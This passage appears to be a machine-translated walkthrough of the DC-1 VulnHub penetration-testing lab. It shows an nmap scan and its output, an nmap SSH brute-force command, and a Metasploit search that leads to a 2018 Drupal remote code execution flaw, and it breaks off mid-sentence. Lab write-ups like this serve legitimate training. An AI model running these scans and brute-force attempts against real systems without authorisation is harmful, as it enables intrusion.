DC-1 target

## An overview of the premise of the article This article introduces DC-1 Penetration test process of target aircraft It's about knowledge ( Comparative basis ): nmap Scan segment port service msf The vulnerability search for drupal7 Command execution using netcat reverse shell mysql Basic operation sudi Right of withdrawal ## Building the basic environment Target download address :[http://www.five86.com/downloads/DC-1.zip](http://www.five86.com/downloads/DC-1.zip) [https://download.vulnhub.com/dc/DC-1.zip](https://download.vulnhub.com/dc/DC-1.zip) VMware（windows）:[https://www.52pojie.cn/thread-1026907-1-1.html](https://www.52pojie.cn/thread-1026907-1-1.html) Choose a higher version of vmware, Otherwise, it may not support ova Import Download import boot vmware Set selection nat Pattern , Aim to keep your attacker and target in one segment , It can be set according to the network environment, as long as it is in a network segment . ## Basic information collection ### nmap Scan ``` nmap -A 192.168.124.0/24 ``` Scan results Develop 80,111,22ssh Port ``` Host is up (0.00039s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) | ssh-hostkey: | 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA) | 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA) |_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Debian)) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.2.22 (Debian) |_http-title: Welcome to Drupal Site | Drupal Site 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 37454/udp status | 100024 1 39208/udp6 status | 100024 1 52048/tcp status |_ 100024 1 57763/tcp6 status MAC Address: 00:0C:29:A6:59:A3 (VMware) Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.16 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.39 ms 192.168.124.145 ``` ### Blow it up first ssh Well ( No result ) ``` nmap --script=ssh-brute 192.168.124.145 ```  ### Visit 80 Port  Tried to register , Weak password for login , Change password , Invalid , But it turns out admin The user exists wappalyzer Fingerprint identification , Discovery room Drupal System  ## Go to the vulnerability library and msf Search for ``` msfconsole search Drupal ```   If you find a loophole to use, then start msf Well Use 2018 Years of loopholes , It's a remote code execution ( Code audit now really can't understand ,